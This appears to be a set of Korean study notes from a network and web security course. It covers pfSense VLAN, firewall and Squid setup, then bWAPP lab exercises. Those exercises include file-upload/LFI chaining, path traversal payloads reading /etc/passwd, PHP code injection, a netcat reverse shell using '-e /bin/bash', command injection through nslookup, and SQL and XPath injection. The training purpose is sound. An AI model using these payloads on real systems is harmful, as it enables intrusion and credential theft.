PFSENSE가기 +add 초록버튼 save check 풀고 apply group acl가기 이름 server_access 10.10.1.0/24 10.30.1.0/24 10.40.1.0/24 save + 버튼 누르면 펼쳐진다 여기만 allow save 이제 centos 에서 해보자

package manager Squid guard 설치가된다 (confirm 누르고진행하세요) 다시 -> available packages에서 squid설치 완료 내가 설치한 것이나온다 squid proxy server ->local cache save하기 acl 누르기 save general 가서 WAN loopback 뺴고 (lan 이랑 우리가설정한 vlan 들 db,intranet,office,web server) vlan 만 지정하고 나머지는 x (우리가설정한 vlan 들 db,intranet,office,web server) save ---------------------------- office(vlan20 )으로가서 네이버 띄운뒤(firefox) 옆에 pfsense 접속한것를 두고 ->Rea..

저아이피주소-> 새가상시스템 우클릭한뒤 편집누르면된다. 전원키고 콘솔시작후 안잡히면 esc esc enter치면된다! 그래도안되면 껏다키면된다 install 시작하기 한국어 설치시작 루트암호넣고 진행,. 재부팅 완료 진행 설정한 아이피 대역이 잘 적용된걸 확인할수있고 인터넷도 잘되는것을 확인할수있다. 설치성공 ----------------구글에 putty는 office에서 하도록합니다 download putty 우리가 깔았던 centos 7(office)에서 unix 그걸로 깔면된다 (3번째꺼) 열기말고 저장으로 하기!

vmware esxi 키고난뒤 vSphere client 접속하기-> pfsense키기 8(쉘실행) pfctl -d(방화벽끄기) 원래는 이렇게하지말고 내부망에서 접속해야하는데 느리니 크롬에서접속하기 방화벽끄지않으면 접속안되요~ 웹 프록시 서버 구축을 해서 해당 사이트에 url 악성코드가 담긴스크립트, 특정 불건전내용 내 컴퓨터로 오기전에 웹 프록시 서버를 거쳐서 한번 필터링 +ADD OPT4 파란글씨누르기 rules가기 + add 첫번째꺼 우리가 설정했던 db서버를 키자. -\ 속성누르기 추가 -> 표준모드 성공하엿다

cent os 에서 pfsense접속 전부 deny 를해준다 vlan20_office-> vlan40_db로 가는모든것을 전부 deny 를해준다(차단한뒤) 특정 포트만 열어주는 설정을해본다. 모든 프로토콜에 대해 허용하고 만약 DB vlan으로 가는 TCP일 경우에만 ACL에서 차단한다. -----------Vlan20 office 방화벽 설정 office->db로가는것을 전부 deny 첫번쨰add 초록버튼 누르기 office->db 이거는 로그남게 save -> apply change office-> db까지 전부다 차단시키고 사용할포트만 열어주는것이다 -------------ssh 허용 office->db로가는것을 전부 deny된걸을 ssh만 허용 다시 첫번쨰 add 초록버튼 save -> apply..

새가상시스템 --- 전원키고 콘솔누르기 진행 기다린다 안되면 일단 ENTER 그래도 인식못하면 껏다가 다시이미지 연결후 실행 화면 나오면 설치대상 누르고 완료누르면 자동으로 나옴 표준파티션하고 그리고완료 변경사항 적용 네트워크 연결 설치시작 암호넣고진행 재부팅 시작. 설정완료. 잘설치가됬고이제 설정한 ip 대역 범위가 잘 할당 되었다. VLAN40_DB도 인터넷 잘되게 깔린걸 확인할수있다.

VLAN40_DB 대역 10.40.1.2~50까지 centos 에서 pfsense접속후 assignments클릭 +add 초록버튼 save interface Assignments가기 +add 초록버튼 OPT3누르기 SAVE -> apply change 적용하기 Rules 로 가기 첫번쨰 ADD 초록버튼 누르고 SAVE -> apply change DHCP server 스크롤 밑으로 range 를 10.40.1.2 from 10.40.1.50 으로 바꾸세요!!!! (오타낫어요~) save ------------------------------------------ 속성 누르기 추가누르기 완료

전원킨뒤 콘솔시작 esc -esc -enter 만약 부팅안되면 껏다 키기 시작 완료누르면 수동이 자동으로뜬다 +버튼 누르기 설치진행 설정 하고 완료 설정이 아주잘되엇고 인터넷도잘되는것을 확인하엿다

실습과제 : pfsense를 사용하여 Vlan20 생성 이름 : VLAN_20 Office 네트워크 대역 : 10.20.1.1~50 들어간뒤에 add초록버튼 interfaces /interface Assignments가기 add 초록버튼 누 OPT2 파란버튼 누르기 스크롤 밑으로 save -> apply change Rules 가기 add 초록버튼 누르고 save -> apply change DHCP server save -> change ------------------------- 속성 누르기 추가 누르기 가상시스템 완료

콘솔 키고나서 iso 이미지에 연결에 centos 7 x64 iso 파일 넣기 혹시나 연결 완료누르면 수동파티션설정이 뜬다 네트워크 연결도 설치시작 누르기 진행 다되면 재부팅 시작 네트워크 연결 vSphere에 centos 설치완료 아까 설정했던 ip 주소의 범위가 할당된것을 확인할수있다. 인터넷이되는지확인했더니 된다.

- centos에서 pfsense키기 centos 키고 이런식으로 방화벽을 끄면 안에있는 centos 에서 접속이 가능하게 해야한다. +add 초록색 저것을 누르고 +add 를 누른다 vlan10 왼쪽에 파란글찌 OPT1 클릭 VLAN10= WEB server 이뒤에 save누르고 자동으로뜨는걸 appply changes해준다 save - apply change add누르고 save -> apply change vlan 10 10.10.1.1 부여 해당 포트숫자 만큼 vlan 10 부어 10.10.1.2 10.10.1.50 save --------------------------------- 표준스위치 vSwitch2 속성 누르기 추가 누르기 exi 안에 현재 두개의 가상시스템이존재한다. 가상시스템 ->..

pfsense 2.4.5 버전 다시설치 표준모드-> 완료전 편집 누르기 전원키고 콘솔열기 콘솔키고 -> pfsense(2.4.5 iso)넣고 esc+esc+enter 설치 진행. 전부 enter진행 no reboot 진행하기! ip가 이상하니 수정한다 1 n em1 em0 y 컨트롤c exit 진행하기 1 n em0 em1 y 컨트롤c exit 진행하기 1 n em0 em1 y 컨트롤c exit 진행하기 8(shell진행) pfctl -d (방화벽끄기) admin pfsense service ->dhcp server ->lan enabvle dhcp 끄기 save interface ->LAN (안될시에 pfctl -d 콘솔에서 계속진행) IPV4 configuration Type =dhcp MTU =14..

그전에 설치해놨던 esxi 실행 192.168.0.117 로 clieent접속실행 그전에 설정해놨던 pfsense 콘솔시작 주소가 잘못되있다 8 (쉘) 누르기 ifconfig |more 1 n em1 em0 enter y 컨트롤c exit 진행하기 만약안된다면 -첫번쨰방법 1 n em0 em1 enter y (초기설정으로돌리고) 1 n em1 em0 enter y 컨트롤c exit (바꾸고싶은과정으로다시진행) (안된다는것의 의미 아이피주소가 이상하게나올떄) 그래도안된다면----------------------------------------------- 8 (shell) pfctl -d (방화벽끄기 admin 그전에 내가 설정햇던 비밀번호로 로그인을진행한다. 들어가기)

security lever high 로 맞추고 Unrestricted File Upload -high + Remote & local file lnclusion (RFI/LFI) 결합해서 푸는문제이다 업로드 불가 하지만 jpg,png로 올릴수있다고한다 이것을 아예 jpg로 파일을 올려버린다. 그러면 업로드는 성공했지만 꺠진다 그러므로 다른곳에서 실행을 한번해본다. Remote & local file lnclusion (RFI/LFI) 전글에 했던 취약점을이용해 내가 올린 파일을 실행해보려고한다. Remote & Local File Inclusion (RFI/LFI) 로 이동한다 low 로 진행하기!!!!!! low,low,low langeuage=images/aaaaaa.jpg&action=go삽입 (전에..

php 확장자 종류 확인 (구글에 찾아보기) php2 php3 파일 확장자로 바꿔서 올리면 된다 here을 누른다.

서버 다운로드 취약점 + 원격 명령어 실행 english fr 언어를 변경하면 안에 url 이 자꾸 바뀌는 것을 알수있다. 그러므로 lang_fr.php 이파일들이 자꾸 실행되는것을알수있다 그로므로 language 뒤를 바꾼다. language=/etc/passwd&action=go language=../../../etc/passwd&action=go 출력완료. lang_fr.php => 있는곳에서 실행이되게한다. -----------------------------------

message를 클릭했을때 주소창이뜨는것을 보고 http://192.168.1.75/bwAPP/phpi.php?message=phpinfo() php info를 넣어본다 php 명령어 : php info() os (리눅스 명령어) : system("ls") http://192.168.1.75/bwAPP/phpi.php?message=cat /etc/passwd =--------------------------- netcat php code injection 을 이용한 리버스쉘 서버 -> 클라이언트로 접속해서 클라이언트에서 쉘을 얻는 것. ------------------------------------- cmd(윈도우) nc -lvp 7777 system("nc 윈도우아이피 7777 -e /bin/bas..

eternallybored.org/misc/netcat/ netcat 1.11 for Win32/Win64 eternallybored.org netcat 1.11 을 다운하여 푼다. 백신에 걸리면 예외처리나 방화벽을 끄세요 검사제외하기 ---------------------------- nelookup www.nsa.gov 처럼 nslookup명령어만 사용이된디. 이걸 쉽게 볼려면 커맨드창을 띄운다(cmd) nslookup 내가원하는url 주소 nslookup www.google.co.kr nslookup www.nav.gov;ls ; 를추가 하면 두개를 이어서 출력하지만 nslookup www.nav.gov | ls ls만 실행이된다. www.nsa.gov;cat /etc/passwd 이거나 www.n..

entry에 aa를 입력하면 insert into table values(no, date, entry, owner,) 이런식으로 예상을하고 어떻게 순서가 insert into table values(no, date(), 'aa', user()) insert into table values(no, date(), 'aa', (select @@version)) 'aa' 이부분이 바로 사용자가 입력을 하는부분이므로 이 entry 위치에 sql injection을 걸면된다 insert into table values(no, date, entry, owner) 사용자의 입력부분(aa)을 조작해서 다음 결과가 나오게한다 - ----------------현재 접속중인 db의 전체 테이블 목록리스트를 출력(우리의 목적)..

XML/XPath Injection (Login Form) 요기에 id password의 정보로 로그인을하면된다. 데이터베이스의 느낌이라고 생각하면 된다. 성공하엿다 --------------------------- xml - 데이터를 저장하거나, 데이터를 송수신 할떄 쓰는 프로토콜 ex) 6명의 회원 정보를 관리하고 싶다. db 설치 - 웹 서비스 연동 -> 복잡하고,불편하다 간단히 소량의 데이터를 저장/전송 -> xml,json,yaml 복잡하고 가동성이 떨어져서 잘쓰지않는다 그래서 여러가지가 나오고 xml은 거의안쓰고 JSON(단점 ;표 쉼표 그런게많아서 눈을 알아보기가 힘들다),Yaml을많이쓴다